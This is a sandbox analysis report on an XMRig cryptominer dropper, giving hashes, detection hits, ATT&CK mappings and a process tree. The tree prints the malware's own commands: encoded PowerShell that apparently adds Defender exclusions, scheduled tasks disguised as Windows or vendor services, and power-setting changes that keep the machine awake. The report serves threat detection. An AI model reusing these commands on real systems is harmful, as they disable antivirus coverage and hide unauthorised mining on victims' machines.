xmrig | a5ea48e864640a9562da03abdd54cfa617a4699cec0238299bdda5ccb28cfe8d

Analysis

max time kernel
150s
max time network
134s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
19-03-2023 14:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a5ea48e864640a9562da03abdd54cfa617a4699cec0238299bdda5ccb28cfe8d.exe
Size

214KB
MD5

8882daf740d94819afcce024bce34a37
SHA1

4bdb80e664638201f393a49e5577886683d54662
SHA256

a5ea48e864640a9562da03abdd54cfa617a4699cec0238299bdda5ccb28cfe8d
SHA512

6ba0c7863713c4334ce511ee7ea7460ea6dacdb243008fae1556a3db7740e6ae53f30e03309f3cc3bf0394328f470a880bf8ed31ee7552ef47dd3823a6ef4c97
SSDEEP

6144:O6nLK128LbhLJuLZePizkHQ3EqdYmkRMUx:DLK12gJuLZ0iIHqfG

Score

10^/10

xmrig miner

Malware Config

Signatures

XMRig Miner payload 6 IoCs

miner

resource	yara_rule
behavioral1/files/0x000600000001af3e-1709.dat	family_xmrig
behavioral1/files/0x000600000001af3e-1709.dat	xmrig
behavioral1/memory/5072-1711-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral1/files/0x000600000001af3e-1713.dat	family_xmrig
behavioral1/files/0x000600000001af3e-1713.dat	xmrig
behavioral1/memory/1936-1715-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	AppLaunch.exe

Executes dropped EXE 3 IoCs

pid	Process
504	dllhost.exe
5072	winlogson.exe
1936	winlogson.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1308 set thread context of 1764	1308	a5ea48e864640a9562da03abdd54cfa617a4699cec0238299bdda5ccb28cfe8d.exe	67

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2156	1308	WerFault.exe	65

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3928	schtasks.exe
1340	schtasks.exe
3760	schtasks.exe
4704	schtasks.exe
3708	schtasks.exe
2976	schtasks.exe
3680	schtasks.exe
3828	schtasks.exe
4700	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1764	AppLaunch.exe
2692	powershell.exe
2692	powershell.exe
2692	powershell.exe
1924	powershell.exe
1924	powershell.exe
3792	powershell.exe
3792	powershell.exe
3604	powershell.exe
3604	powershell.exe
4444	powershell.exe
4444	powershell.exe
2992	powershell.exe
2992	powershell.exe
1924	powershell.exe
3792	powershell.exe
3604	powershell.exe
2992	powershell.exe
4444	powershell.exe
1924	powershell.exe
3792	powershell.exe
3604	powershell.exe
4444	powershell.exe
2992	powershell.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe
504	dllhost.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	1764	AppLaunch.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeShutdownPrivilege	3640	powercfg.exe
Token: SeCreatePagefilePrivilege	3640	powercfg.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	3792	powershell.exe
Token: SeShutdownPrivilege	432	powercfg.exe
Token: SeCreatePagefilePrivilege	432	powercfg.exe
Token: SeDebugPrivilege	3604	powershell.exe
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeDebugPrivilege	2992	powershell.exe
Token: SeShutdownPrivilege	3196	powercfg.exe
Token: SeCreatePagefilePrivilege	3196	powercfg.exe
Token: SeShutdownPrivilege	5000	powercfg.exe
Token: SeCreatePagefilePrivilege	5000	powercfg.exe
Token: SeDebugPrivilege	504	dllhost.exe
Token: SeShutdownPrivilege	4900	powercfg.exe
Token: SeCreatePagefilePrivilege	4900	powercfg.exe
Token: SeShutdownPrivilege	4900	powercfg.exe
Token: SeCreatePagefilePrivilege	4900	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1308 wrote to memory of 1764	1308	a5ea48e864640a9562da03abdd54cfa617a4699cec0238299bdda5ccb28cfe8d.exe	67
PID 1308 wrote to memory of 1764	1308	a5ea48e864640a9562da03abdd54cfa617a4699cec0238299bdda5ccb28cfe8d.exe	67
PID 1308 wrote to memory of 1764	1308	a5ea48e864640a9562da03abdd54cfa617a4699cec0238299bdda5ccb28cfe8d.exe	67
PID 1308 wrote to memory of 1764	1308	a5ea48e864640a9562da03abdd54cfa617a4699cec0238299bdda5ccb28cfe8d.exe	67
PID 1308 wrote to memory of 1764	1308	a5ea48e864640a9562da03abdd54cfa617a4699cec0238299bdda5ccb28cfe8d.exe	67
PID 1764 wrote to memory of 3084	1764	AppLaunch.exe	71
PID 1764 wrote to memory of 3084	1764	AppLaunch.exe	71
PID 1764 wrote to memory of 3084	1764	AppLaunch.exe	71
PID 3084 wrote to memory of 2692	3084	cmd.exe	73
PID 3084 wrote to memory of 2692	3084	cmd.exe	73
PID 3084 wrote to memory of 2692	3084	cmd.exe	73
PID 1764 wrote to memory of 504	1764	AppLaunch.exe	74
PID 1764 wrote to memory of 504	1764	AppLaunch.exe	74
PID 1764 wrote to memory of 504	1764	AppLaunch.exe	74
PID 1764 wrote to memory of 696	1764	AppLaunch.exe	102
PID 1764 wrote to memory of 696	1764	AppLaunch.exe	102
PID 1764 wrote to memory of 696	1764	AppLaunch.exe	102
PID 1764 wrote to memory of 3508	1764	AppLaunch.exe	75
PID 1764 wrote to memory of 3508	1764	AppLaunch.exe	75
PID 1764 wrote to memory of 3508	1764	AppLaunch.exe	75
PID 1764 wrote to memory of 228	1764	AppLaunch.exe	101
PID 1764 wrote to memory of 228	1764	AppLaunch.exe	101
PID 1764 wrote to memory of 228	1764	AppLaunch.exe	101
PID 1764 wrote to memory of 168	1764	AppLaunch.exe	76
PID 1764 wrote to memory of 168	1764	AppLaunch.exe	76
PID 1764 wrote to memory of 168	1764	AppLaunch.exe	76
PID 1764 wrote to memory of 312	1764	AppLaunch.exe	100
PID 1764 wrote to memory of 312	1764	AppLaunch.exe	100
PID 1764 wrote to memory of 312	1764	AppLaunch.exe	100
PID 1764 wrote to memory of 224	1764	AppLaunch.exe	99
PID 1764 wrote to memory of 224	1764	AppLaunch.exe	99
PID 1764 wrote to memory of 224	1764	AppLaunch.exe	99
PID 1764 wrote to memory of 4812	1764	AppLaunch.exe	98
PID 1764 wrote to memory of 4812	1764	AppLaunch.exe	98
PID 1764 wrote to memory of 4812	1764	AppLaunch.exe	98
PID 1764 wrote to memory of 2264	1764	AppLaunch.exe	97
PID 1764 wrote to memory of 2264	1764	AppLaunch.exe	97
PID 1764 wrote to memory of 2264	1764	AppLaunch.exe	97
PID 1764 wrote to memory of 2220	1764	AppLaunch.exe	96
PID 1764 wrote to memory of 2220	1764	AppLaunch.exe	96
PID 1764 wrote to memory of 2220	1764	AppLaunch.exe	96
PID 1764 wrote to memory of 596	1764	AppLaunch.exe	95
PID 1764 wrote to memory of 596	1764	AppLaunch.exe	95
PID 1764 wrote to memory of 596	1764	AppLaunch.exe	95
PID 1764 wrote to memory of 2208	1764	AppLaunch.exe	94
PID 1764 wrote to memory of 2208	1764	AppLaunch.exe	94
PID 1764 wrote to memory of 2208	1764	AppLaunch.exe	94
PID 1764 wrote to memory of 3236	1764	AppLaunch.exe	93
PID 1764 wrote to memory of 3236	1764	AppLaunch.exe	93
PID 1764 wrote to memory of 3236	1764	AppLaunch.exe	93
PID 1764 wrote to memory of 2924	1764	AppLaunch.exe	78
PID 1764 wrote to memory of 2924	1764	AppLaunch.exe	78
PID 1764 wrote to memory of 2924	1764	AppLaunch.exe	78
PID 1764 wrote to memory of 3940	1764	AppLaunch.exe	77
PID 1764 wrote to memory of 3940	1764	AppLaunch.exe	77
PID 1764 wrote to memory of 3940	1764	AppLaunch.exe	77
PID 4812 wrote to memory of 4700	4812	cmd.exe	103
PID 4812 wrote to memory of 4700	4812	cmd.exe	103
PID 4812 wrote to memory of 4700	4812	cmd.exe	103
PID 3508 wrote to memory of 2976	3508	cmd.exe	104
PID 3508 wrote to memory of 2976	3508	cmd.exe	104
PID 3508 wrote to memory of 2976	3508	cmd.exe	104
PID 596 wrote to memory of 1924	596	cmd.exe	105
PID 596 wrote to memory of 1924	596	cmd.exe	105

C:\Users\Admin\AppData\Local\Temp\a5ea48e864640a9562da03abdd54cfa617a4699cec0238299bdda5ccb28cfe8d.exe
"C:\Users\Admin\AppData\Local\Temp\a5ea48e864640a9562da03abdd54cfa617a4699cec0238299bdda5ccb28cfe8d.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1308
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
  2⤵
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1764
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAFEATgBoAEMASgBaAEMAagBkADMAUwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQASgBHAE4ASgB1AFgAagB6ADEAdQB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkATgB5AFMARwBqAHUAQQBMAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAegBzAHYAIwA+AA=="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3084
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAFEATgBoAEMASgBaAEMAagBkADMAUwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQASgBHAE4ASgB1AFgAagB6ADEAdQB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkATgB5AFMARwBqAHUAQQBMAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAegBzAHYAIwA+AA=="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2692
- - C:\ProgramData\Dllhost\dllhost.exe
    "C:\ProgramData\Dllhost\dllhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:504
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:1036
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:4108
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:1768
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        
        PID:5072
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:3064
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:1400
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        
        PID:1936
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo АNУЖ & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo rkX7тYGFx
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3508
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:2976
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo м0ЭTеZьLдЩPF0PП & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЪSз
    3⤵
    PID:168
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4704
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo ЕoФсЙ & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo x6оrJhqЩпАХwqмЗjчl
    3⤵
    PID:3940
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3640
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:432
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3196
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5000
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /hibernate off
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4900
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3708
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjACAEPQRPBDcEHARTAHEAEwRYACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAEgRvAEUEEQQ1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBlACoETABBACUEPARjABkESABJADUAEQRFACMAPgAgAEAAKAAgADwAIwBSABQEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAB0EEAQyBG0ASgAUBG8AGQR5ADcEMQRHBHIANQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAbwBaABIEQQBBAGUAOAR3ADoELQRNAE8EHgQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBIBFIALwQhBCMAPgA="
    3⤵
    PID:2924
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjACAEPQRPBDcEHARTAHEAEwRYACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAEgRvAEUEEQQ1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBlACoETABBACUEPARjABkESABJADUAEQRFACMAPgAgAEAAKAAgADwAIwBSABQEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAB0EEAQyBG0ASgAUBG8AGQR5ADcEMQRHBHIANQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAbwBaABIEQQBBAGUAOAR3ADoELQRNAE8EHgQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBIBFIALwQhBCMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4444
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAEgAQARBBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAUQBNBEoAQgAUBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBEBEkEIAQ4BCMEbAAXBDYEZABNAEMETgAjAD4AIABAACgAIAA8ACMASQQzACcEWAAwACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBRACYEcgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAKwQQBDcAIAQRBBwEYgBIBEYAZQAXBDcEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAHgRnAEYERgAjAD4A"
    3⤵
    PID:3236
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAEgAQARBBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAUQBNBEoAQgAUBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBEBEkEIAQ4BCMEbAAXBDYEZABNAEMETgAjAD4AIABAACgAIAA8ACMASQQzACcEWAAwACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBRACYEcgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAKwQQBDcAIAQRBBwEYgBIBEYAZQAXBDcEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAHgRnAEYERgAjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3604
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAGIAWQBGBEgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBnADoEOAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAMQBnABcELARNBDIEZgAjAD4AIABAACgAIAA8ACMATQApBCQEEARNBGYAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjADwEcgAsBEYAJARCBHkAQgR0AEEENQA8BE0APAQZBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwByAG4ARQRCAEsATwQqBDYAJwQ3BHUAJgQVBCYEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAUgBUADMESQQsBCMAPgA="
    3⤵
    PID:2208
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAGIAWQBGBEgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBnADoEOAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAMQBnABcELARNBDIEZgAjAD4AIABAACgAIAA8ACMATQApBCQEEARNBGYAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjADwEcgAsBEYAJARCBHkAQgR0AEEENQA8BE0APAQZBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwByAG4ARQRCAEsATwQqBDYAJwQ3BHUAJgQVBCYEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAUgBUADMESQQsBCMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2992
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAGkAQARKAEcANgBCBEQAVwBuADIETQQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjACgENQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBQACEERARHBCMAPgAgAEAAKAAgADwAIwBFBBcEcgA4BCsERwB2ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBGBDUANARHBE0AeQAhBG8AKAQ2AHcARwBOACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwAkBDYAbQAoBBgEEAQsBDYERAQRBDsEUgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwApBHIASAQwBDYAaABEBEsEIwA+AA=="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:596
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAGkAQARKAEcANgBCBEQAVwBuADIETQQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjACgENQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBQACEERARHBCMAPgAgAEAAKAAgADwAIwBFBBcEcgA4BCsERwB2ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBGBDUANARHBE0AeQAhBG8AKAQ2AHcARwBOACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwAkBDYAbQAoBBgEEAQsBDYERAQRBDsEUgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwApBHIASAQwBDYAaABEBEsEIwA+AA=="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1924
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAE4AMgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEoETARXAFoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEMEFQRGBCMAPgAgAEAAKAAgADwAIwBIBHYALwRZAFIAUQBLBEsEGwRvABcETAQ7BDcEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjABAEOQR3AGkAMgBIAEkAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjADYATwRuACEEOQQuBEQAZABjAEgASgRYAGkALQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5BDwEEgQ0AHIAeQAwBDEALwR0ABEEPQRKBFEAIwA+AA=="
    3⤵
    PID:2220
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAE4AMgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEoETARXAFoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEMEFQRGBCMAPgAgAEAAKAAgADwAIwBIBHYALwRZAFIAUQBLBEsEGwRvABcETAQ7BDcEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjABAEOQR3AGkAMgBIAEkAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjADYATwRuACEEOQQuBEQAZABjAEgASgRYAGkALQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5BDwEEgQ0AHIAeQAwBDEALwR0ABEEPQRKBFEAIwA+AA=="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3792
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo чэПYNнГУ8СDЫMЪe6 & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo
    3⤵
    PID:2264
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3828
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo дп9q & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo рьГbnЛNNBЛ
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4812
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4700
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo иDbqПеРYAАWХ & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo db7Ю
    3⤵
    PID:224
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3760
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo М7X & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo РнxiяuчЩачнВgЧfGИg
    3⤵
    PID:312
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1340
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo DJЬLхжчSL & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo зGшAZfDз3з
    3⤵
    PID:228
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3928
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo вГychjъ2Рз & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo rrЭ
    3⤵
    PID:696
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3680
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 516
  2⤵
  - Program crash
  PID:2156

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
